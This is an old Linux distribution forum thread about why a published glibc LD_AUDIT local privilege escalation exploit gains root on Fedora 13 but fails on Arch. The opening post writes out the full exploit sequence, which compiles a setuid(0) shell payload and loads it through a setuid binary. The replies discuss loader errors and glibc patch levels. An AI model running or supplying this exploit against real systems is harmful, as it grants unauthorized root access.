You are not logged in.
- Topics: Active | Unanswered
#1 2010-10-20 07:55:30
- sonoran
- Member
- From: sonoran desert
- Registered: 2009-01-12
- Posts: 192
Why doesn't exploit work in Arch?
Can anyone explain why this exploit does not work in Arch? http://www.exploit-db.com/exploits/15274/
It does indeed give you root privilege in Fedora 13, but when I try it in Arch both the gnome-terminal and xterm windows simply disappear after entering the last command.
cd /tmp
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
echo 'void __attribute__((constructor)) init(){setuid(0);system("/bin/bash");}' > payload.c
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3Offline
#2 2010-10-20 09:39:29
- badboy
- Member
- Registered: 2009-01-02
- Posts: 32
Re: Why doesn't exploit work in Arch?
if you first exec a new shell or just use one of the vtys you get: "Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!"
Other versions are probably affected, possibly via different vectors. I'm aware
several versions of ld.so in common use hit an assertion in dl_open_worker, I
do not know if it's possible to avoid this.
Is it clear now?
Offline
#3 2010-10-20 10:56:07
- sonoran
- Member
- From: sonoran desert
- Registered: 2009-01-12
- Posts: 192
Re: Why doesn't exploit work in Arch?
Thanks for the reply, I hadn't thought to try it in a vty. I was a bit astonished when my terminal windows vanished, and nothing in the logs.
Offline
#4 2010-10-20 11:12:29
- wonder
- Developer
- From: Bucharest, Romania
- Registered: 2006-07-05
- Posts: 5,941
- Website
Re: Why doesn't exploit work in Arch?
i think is because we have a glibc that is not affected by this. is a snapshot since 20101007
Give what you have. To someone, it may be better than you dare to think.
Offline
#5 2010-10-20 11:21:02
- Allan
- Pacman
- From: Brisbane, AU
- Registered: 2007-06-09
- Posts: 11,400
- Website
Re: Why doesn't exploit work in Arch?
i think is because we have a glibc that is not affected by this. is a snapshot since 20101007
Really? What an awesome glibc maintainer we must have! 
Offline
#6 2010-10-20 11:57:19
- sonoran
- Member
- From: sonoran desert
- Registered: 2009-01-12
- Posts: 192
Re: Why doesn't exploit work in Arch?
So Allan didn't break it after all? 
While certain distros-that-will-be-nameless scramble to fix it (http://koji.fedoraproject.org/koji/buil … dID=201079), Arch sails securely on...
Offline
#7 2010-10-20 12:14:09
- Allan
- Pacman
- From: Brisbane, AU
- Registered: 2007-06-09
- Posts: 11,400
- Website
Re: Why doesn't exploit work in Arch?
Well... we do not actually have the fix Fedora are busy pushing.
So I am really not sure why it does not work. Maybe one of the other patches I used breaks it?
Offline
#8 2010-10-20 12:45:39
- lolilolicon
- Member
- Registered: 2009-03-05
- Posts: 1,722
Re: Why doesn't exploit work in Arch?
...So Allan somehow broke it after all?
This silver ladybug at line 28...
Offline